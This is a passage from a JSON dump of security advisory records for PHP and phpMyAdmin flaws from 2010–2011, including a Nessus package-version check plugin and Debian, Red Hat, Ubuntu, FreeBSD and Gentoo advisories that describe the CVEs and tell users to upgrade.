"CVE-2010-4697", "CVE-2010-4698", "CVE-2010-4699", "CVE-2010-4700", "CVE-2011-0420", "CVE-2011-0421", "CVE-2011-0708", "CVE-2011-0752", "CVE-2011-0753", "CVE-2011-0755", "CVE-2011-1092", "CVE-2011-1148", "CVE-2011-1153", "CVE-2011-1464", "CVE-2011-1466", "CVE-2011-1467", "CVE-2011-1468", "CVE-2011-1469", "CVE-2011-1470", "CVE-2011-1471", "CVE-2011-1657", "CVE-2011-1938", "CVE-2011-2202", "CVE-2011-2483", "CVE-2011-3182", "CVE-2011-3189", "CVE-2011-3267", "CVE-2011-3268"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:php", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201110-06.NASL", "href": "https://www.tenable.com/plugins/nessus/56459", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201110-06.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56459);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-7243\", \"CVE-2009-5016\", \"CVE-2010-1128\", \"CVE-2010-1129\", \"CVE-2010-1130\", \"CVE-2010-1860\", \"CVE-2010-1861\", \"CVE-2010-1862\", \"CVE-2010-1864\", \"CVE-2010-1866\", \"CVE-2010-1868\", \"CVE-2010-1914\", \"CVE-2010-1915\", \"CVE-2010-1917\", \"CVE-2010-2093\", \"CVE-2010-2094\", \"CVE-2010-2097\", \"CVE-2010-2100\", \"CVE-2010-2101\", \"CVE-2010-2190\", \"CVE-2010-2191\", \"CVE-2010-2225\", \"CVE-2010-2484\", \"CVE-2010-2531\", \"CVE-2010-2950\", \"CVE-2010-3062\", \"CVE-2010-3063\", \"CVE-2010-3064\", \"CVE-2010-3065\", \"CVE-2010-3436\", \"CVE-2010-3709\", \"CVE-2010-3710\", \"CVE-2010-3870\", \"CVE-2010-4150\", \"CVE-2010-4409\", \"CVE-2010-4645\", \"CVE-2010-4697\", \"CVE-2010-4698\", \"CVE-2010-4699\", \"CVE-2010-4700\", \"CVE-2011-0420\", \"CVE-2011-0421\", \"CVE-2011-0708\", \"CVE-2011-0752\", \"CVE-2011-0753\", \"CVE-2011-0755\", \"CVE-2011-1092\", \"CVE-2011-1148\", \"CVE-2011-1153\", \"CVE-2011-1464\", \"CVE-2011-1466\", \"CVE-2011-1467\", \"CVE-2011-1468\", \"CVE-2011-1469\", \"CVE-2011-1470\", \"CVE-2011-1471\", \"CVE-2011-1657\", \"CVE-2011-1938\", \"CVE-2011-2202\", \"CVE-2011-2483\", \"CVE-2011-3182\", \"CVE-2011-3189\", \"CVE-2011-3267\", \"CVE-2011-3268\");\n script_xref(name:\"GLSA\", value:\"201110-06\");\n\n script_name(english:\"GLSA-201110-06 : PHP: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in 
GLSA-201110-06\n(PHP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in PHP. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A context-dependent attacker could execute arbitrary code, obtain\n sensitive information from process memory, bypass intended access\n restrictions, or cause a Denial of Service in various ways.\n A remote attacker could cause a Denial of Service in various ways,\n bypass spam detections, or bypass open_basedir restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201110-06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All PHP users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/php-5.3.8'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-lang/php\", unaffected:make_list(\"ge 5.3.8\"), vulnerable:make_list(\"lt 5.3.8\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"PHP\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "freebsd": [{"lastseen": "2023-12-02T16:48:26", "description": "\n\nThe phpMyAdmin development team reports:\n\nIt was possible to manipulate the PHP session superglobal using\n\t some of the Swekey authentication code. This could open a path\n\t for other attacks.\n\n\nAn unsanitized key from the Servers array is written in a comment\n\t of the generated config. An attacker can modify this key by\n\t modifying the SESSION superglobal array. 
This allows the attacker\n\t to close the comment and inject code.\n\n\nThrough a possible bug in PHP running on Windows systems a NULL\n\t byte can truncate the pattern string allowing an attacker to\n\t inject the /e modifier causing the preg_replace function to\n\t execute its second argument as PHP code.\n\n\nFixed filtering of a file path in the MIME-type transformation\n\t code, which allowed for directory traversal.\n\n\n", "cvss3": {}, "published": "2011-07-02T00:00:00", "type": "freebsd", "title": "phpmyadmin -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508"], "modified": "2011-07-28T00:00:00", "id": "7E4E5C53-A56C-11E0-B180-00216AA06FC2", "href": "https://vuxml.freebsd.org/freebsd/7e4e5c53-a56c-11e0-b180-00216aa06fc2.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-06-28T06:36:12", "description": "\nSeveral remote vulnerabilities have been discovered in PHP\u00a05, an hypertext\npreprocessor.\nThe Common Vulnerabilities and Exposures project identifies the following\nproblems:\n\n\n* [CVE-2010-1917](https://security-tracker.debian.org/tracker/CVE-2010-1917)\nThe fnmatch function can be abused to conduct denial of service attacks\n (by crashing the interpreter) by the means of a stack overflow.\n* [CVE-2010-2225](https://security-tracker.debian.org/tracker/CVE-2010-2225)\nThe SplObjectStorage unserializer allows attackers to execute arbitrary\n code via 
serialized data by the means of a use-after-free\n vulnerability.\n* [CVE-2010-3065](https://security-tracker.debian.org/tracker/CVE-2010-3065)\nThe default sessions serializer does not correctly handle a special\n marker, which allows an attacker to inject arbitrary variables into the\n session and possibly exploit vulnerabilities in the unserializer.\n* [CVE-2010-1128](https://security-tracker.debian.org/tracker/CVE-2010-1128)\nFor this vulnerability (predictable entropy for the Linear Congruential\n Generator used to generate session ids) we do not consider upstream's\n solution to be sufficient. It is recommended to uncomment the\n session.entropy\\_file and session.entropy\\_length settings in the php.ini\n files. Further improvements can be achieved by setting\n session.hash\\_function to 1 (one) and incrementing the value of\n session.entropy\\_length.\n\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 5.2.6.dfsg.1-1+lenny9.\n\n\nFor the testing distribution (squeeze) and the unstable distribution (sid),\nthese problems will be fixed soon.\n\n\nWe recommend that you upgrade your php5 packages.\n\n\n", "cvss3": {}, "published": "2010-08-06T00:00:00", "type": "osv", "title": "php5 - several vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1128", "CVE-2010-1917", "CVE-2010-2225", "CVE-2010-3065"], "modified": "2023-06-28T06:35:27", "id": "OSV:DSA-2089-1", "href": "https://osv.dev/vulnerability/DSA-2089-1", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-28T06:47:04", "description": "\nSeveral vulnerabilities were discovered in phpMyAdmin, a tool to\nadministrate MySQL over the web. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\n\n* [CVE-2011-2505](https://security-tracker.debian.org/tracker/CVE-2011-2505)\nPossible session manipulation in Swekey authentication.\n* [CVE-2011-2506](https://security-tracker.debian.org/tracker/CVE-2011-2506)\nPossible code injection in setup script, in case session\n variables are compromised.\n* [CVE-2011-2507](https://security-tracker.debian.org/tracker/CVE-2011-2507)\nRegular expression quoting issue in Synchronize code.\n* [CVE-2011-2508](https://security-tracker.debian.org/tracker/CVE-2011-2508)\nPossible directory traversal in MIME-type transformation.\n* [CVE-2011-2642](https://security-tracker.debian.org/tracker/CVE-2011-2642)\nCross site scripting in table Print view when the attacker can\n create crafted table names.\n* No CVE name yet\n\n Possible superglobal and local variables manipulation in\n Swekey authentication. 
(PMASA-2011-12)\n\n\nThe oldstable distribution (lenny) is only affected by \n[\\\nCVE-2011-2642](https://security-tracker.debian.org/tracker/CVE-2011-2642), which has been fixed in version 2.11.8.1-5+lenny9.\n\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 3.3.7-6.\n\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems have been fixed in version 3.4.3.2-1.\n\n\nWe recommend that you upgrade your phpmyadmin packages.\n\n\n", "cvss3": {}, "published": "2011-07-26T00:00:00", "type": "osv", "title": "phpymadmin - several", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508", "CVE-2011-2642"], "modified": "2023-06-28T06:46:56", "id": "OSV:DSA-2286-1", "href": "https://osv.dev/vulnerability/DSA-2286-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2023-12-02T12:46:11", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2286-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nJuly 26, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : phpymadmin\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-2505 CVE-2011-2506 CVE-2011-2507\n CVE-2011-2508 CVE-2011-2642\n\nSeveral vulnerabilities were discovered in phpMyAdmin, a tool 
to\nadministrate MySQL over the web. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2011-2505\n\n Possible session manipulation in Swekey authentication.\n\nCVE-2011-2506\n\n Possible code injection in setup script, in case session\n variables are compromised.\n\nCVE-2011-2507\n\n Regular expression quoting issue in Synchronize code.\n\nCVE-2011-2508\n\n Possible directory traversal in MIME-type transformation.\n\nCVE-2011-2642\n\n Cross site scripting in table Print view when the attacker can\n create crafted table names.\n\nNo CVE name yet\n\n Possible superglobal and local variables manipulation in\n Swekey authentication. (PMASA-2011-12)\n\nThe oldstable distribution (lenny) is only affected by CVE-2011-2642,\nwhich has been fixed in version 2.11.8.1-5+lenny9.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 3.3.7-6.\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems have been fixed in version 3.4.3.2-1.\n\nWe recommend that you upgrade your phpymadmin packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-07-26T19:11:55", "type": "debian", "title": "[SECURITY] [DSA 2286-1] phpmyadmin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508", "CVE-2011-2642"], "modified": "2011-07-26T19:11:55", "id": "DEBIAN:DSA-2286-1:4CCEC", "href": "https://lists.debian.org/debian-security-announce/2011/msg00160.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2021-10-21T04:45:27", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nAn input validation flaw was discovered in the PHP session serializer. If a\nPHP script generated session variable names from untrusted user input, a\nremote attacker could use this flaw to inject an arbitrary variable into\nthe PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export() function\nimplementation. If some fatal error occurred during the execution of this\nfunction (such as the exhaustion of memory or script execution time limit),\npart of the function's output was sent to the user as script output,\npossibly leading to the disclosure of sensitive information.\n(CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in the\nway the PHP utf8_decode() function decoded partial multi-byte sequences\nfor some multi-byte encodings, sending them to output without them being\nescaped. An attacker could use these flaws to perform a cross-site\nscripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient\nentropy to seed the pseudo-random number generator. A remote attacker could\npossibly use this flaw to predict values returned by the function, which\nare used to generate session identifiers by default. This update changes\nthe function's implementation to use more entropy during seeding.\n(CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the\nlength of the pattern argument. 
A remote attacker could use this flaw to\ncrash the PHP interpreter where a script used fnmatch() on untrusted\nmatching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC\nextension. A malicious XML-RPC client or server could use this flaw to\ncrash the PHP interpreter via a specially-crafted XML-RPC request.\n(CVE-2010-0397)\n\nAll php users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n", "cvss3": {}, "published": "2010-11-29T00:00:00", "type": "redhat", "title": "(RHSA-2010:0919) Moderate: php security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5016", "CVE-2010-0397", "CVE-2010-1128", "CVE-2010-1917", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870"], "modified": "2017-09-08T08:17:21", "id": "RHSA-2010:0919", "href": "https://access.redhat.com/errata/RHSA-2010:0919", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:58", "description": "[5.1.6-27.3]\n- add security fix for CVE-2010-3870 (#626735)\n[5.1.6-27.2]\n- fix var_export test cases (#626735)\n[5.1.6-27.1]\n- add security fixes for CVE-2010-1917, CVE-2010-3065, CVE-2010-2531,\n CVE-2010-1128, CVE-2010-0397 (#626735)", "cvss3": {}, "published": "2010-11-29T00:00:00", "type": "oraclelinux", "title": "php security update", "bulletinFamily": "unix", "cvss2": 
{}, "cvelist": ["CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870", "CVE-2009-5016", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2010-11-29T00:00:00", "id": "ELSA-2010-0919", "href": "http://linux.oracle.com/errata/ELSA-2010-0919.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2023-12-02T17:13:09", "description": "**CentOS Errata and Security Advisory** CESA-2010:0919\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nAn input validation flaw was discovered in the PHP session serializer. If a\nPHP script generated session variable names from untrusted user input, a\nremote attacker could use this flaw to inject an arbitrary variable into\nthe PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export() function\nimplementation. If some fatal error occurred during the execution of this\nfunction (such as the exhaustion of memory or script execution time limit),\npart of the function's output was sent to the user as script output,\npossibly leading to the disclosure of sensitive information.\n(CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in the\nway the PHP utf8_decode() function decoded partial multi-byte sequences\nfor some multi-byte encodings, sending them to output without them being\nescaped. An attacker could use these flaws to perform a cross-site\nscripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient\nentropy to seed the pseudo-random number generator. A remote attacker could\npossibly use this flaw to predict values returned by the function, which\nare used to generate session identifiers by default. 
This update changes\nthe function's implementation to use more entropy during seeding.\n(CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the\nlength of the pattern argument. A remote attacker could use this flaw to\ncrash the PHP interpreter where a script used fnmatch() on untrusted\nmatching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC\nextension. A malicious XML-RPC client or server could use this flaw to\ncrash the PHP interpreter via a specially-crafted XML-RPC request.\n(CVE-2010-0397)\n\nAll php users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2010-December/079367.html\nhttps://lists.centos.org/pipermail/centos-announce/2010-December/079368.html\nhttps://lists.centos.org/pipermail/centos-announce/2010-November/079359.html\nhttps://lists.centos.org/pipermail/centos-announce/2010-November/079360.html\n\n**Affected packages:**\nphp\nphp-bcmath\nphp-cli\nphp-common\nphp-dba\nphp-devel\nphp-domxml\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pdo\nphp-pear\nphp-pgsql\nphp-snmp\nphp-soap\nphp-xml\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2010:0919", "cvss3": {}, "published": "2010-11-30T12:21:14", "type": "centos", "title": "php security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5016", "CVE-2010-0397", "CVE-2010-1128", "CVE-2010-1917", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870"], "modified": "2010-12-01T22:08:34", "id": "CESA-2010:0919", "href": "https://lists.centos.org/pipermail/centos-announce/2010-November/079360.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2023-10-20T14:28:15", "description": "## Releases\n\n * Ubuntu 10.04 \n * Ubuntu 9.10 \n * Ubuntu 9.04 \n * Ubuntu 8.04 \n * Ubuntu 6.06 \n\n## Packages\n\n * php5 \\- \n\nAuke van Slooten discovered that PHP incorrectly handled certain xmlrpc \nrequests. An attacker could exploit this issue to cause the PHP server to \ncrash, resulting in a denial of service. This issue only affected Ubuntu \n6.06 LTS, 8.04 LTS, 9.04 and 9.10. (CVE-2010-0397)\n\nIt was discovered that the pseudorandom number generator in PHP did not \nprovide the expected entropy. An attacker could exploit this issue to \npredict values that were intended to be random, such as session cookies. \nThis issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.04 and 9.10. \n(CVE-2010-1128)\n\nIt was discovered that PHP did not properly handle directory pathnames that \nlacked a trailing slash character. An attacker could exploit this issue to \nbypass safe_mode restrictions. This issue only affected Ubuntu 6.06 LTS, \n8.04 LTS, 9.04 and 9.10. (CVE-2010-1129)\n\nGrzegorz Stachowiak discovered that the PHP session extension did not \nproperly handle semicolon characters. An attacker could exploit this issue \nto bypass safe_mode restrictions. This issue only affected Ubuntu 8.04 LTS, \n9.04 and 9.10. (CVE-2010-1130)\n\nStefan Esser discovered that PHP incorrectly decoded remote HTTP chunked \nencoding streams. 
An attacker could exploit this issue to cause the PHP \nserver to crash and possibly execute arbitrary code with application \nprivileges. This issue only affected Ubuntu 10.04 LTS. (CVE-2010-1866)\n\nMateusz Kocielski discovered that certain PHP SQLite functions incorrectly \nhandled empty SQL queries. An attacker could exploit this issue to possibly \nexecute arbitrary code with application privileges. (CVE-2010-1868)\n\nMateusz Kocielski discovered that PHP incorrectly handled certain arguments \nto the fnmatch function. An attacker could exploit this flaw and cause the \nPHP server to consume all available stack memory, resulting in a denial of \nservice. (CVE-2010-1917)\n\nStefan Esser discovered that PHP incorrectly handled certain strings in the \nphar extension. An attacker could exploit this flaw to possibly view \nsensitive information. This issue only affected Ubuntu 10.04 LTS. \n(CVE-2010-2094, CVE-2010-2950)\n\nStefan Esser discovered that PHP incorrectly handled deserialization of \nSPLObjectStorage objects. A remote attacker could exploit this issue to \nview sensitive information and possibly execute arbitrary code with \napplication privileges. This issue only affected Ubuntu 8.04 LTS, 9.04, \n9.10 and 10.04 LTS. (CVE-2010-2225)\n\nIt was discovered that PHP incorrectly filtered error messages when limits \nfor memory, execution time, or recursion were exceeded. A remote attacker \ncould exploit this issue to possibly view sensitive information. \n(CVE-2010-2531)\n\nStefan Esser discovered that the PHP session serializer incorrectly handled \nthe PS_UNDEF_MARKER marker. An attacker could exploit this issue to alter \narbitrary session variables. 
(CVE-2010-3065)\n", "cvss3": {}, "published": "2010-09-20T00:00:00", "type": "ubuntu", "title": "PHP vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0397", "CVE-2010-1128", "CVE-2010-1129", "CVE-2010-1130", "CVE-2010-1866", "CVE-2010-1868", "CVE-2010-1917", "CVE-2010-2094", "CVE-2010-2225", "CVE-2010-2531", "CVE-2010-2950", "CVE-2010-3065"], "modified": "2010-09-20T00:00:00", "id": "USN-989-1", "href": "https://ubuntu.com/security/notices/USN-989-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2023-12-02T21:07:29", "description": "### Background\n\nphpMyAdmin is a web-based management tool for MySQL databases. \n\n### Description\n\nMultiple vulnerabilities have been discovered in phpMyAdmin. Please review the CVE identifiers and phpMyAdmin Security Advisories referenced below for details. \n\n### Impact\n\nRemote attackers might be able to insert and execute PHP code, include and execute local PHP files, or perform Cross-Site Scripting (XSS) attacks via various vectors. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll phpMyAdmin users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-3.4.9\"", "cvss3": {}, "published": "2012-01-04T00:00:00", "type": "gentoo", "title": "phpMyAdmin: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7251", "CVE-2008-7252", "CVE-2010-2958", "CVE-2010-3055", "CVE-2010-3056", "CVE-2010-3263", "CVE-2011-0986", "CVE-2011-0987", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508", "CVE-2011-2642", "CVE-2011-2643", "CVE-2011-2718", "CVE-2011-2719", "CVE-2011-3646", "CVE-2011-4064", "CVE-2011-4107", "CVE-2011-4634", "CVE-2011-4780", "CVE-2011-4782"], "modified": "2012-01-04T00:00:00", "id": "GLSA-201201-01", "href": "https://security.gentoo.org/glsa/201201-01", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-02T21:07:41", "description": "### Background\n\nPHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. \n\n### Description\n\nMultiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details. 
\n\n### Impact\n\nA context-dependent attacker could execute arbitrary code, obtain sensitive information from process memory, bypass intended access restrictions, or cause a Denial of Service in various ways. \n\nA remote attacker could cause a Denial of Service in various ways, bypass spam detections, or bypass open_basedir restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll PHP users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/php-5.3.8\"", "cvss3": {}, "published": "2011-10-10T00:00:00", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-7243", "CVE-2009-5016", "CVE-2010-1128", "CVE-2010-1129", "CVE-2010-1130", "CVE-2010-1860", "CVE-2010-1861", "CVE-2010-1862", "CVE-2010-1864", "CVE-2010-1866", "CVE-2010-1868", "CVE-2010-1914", 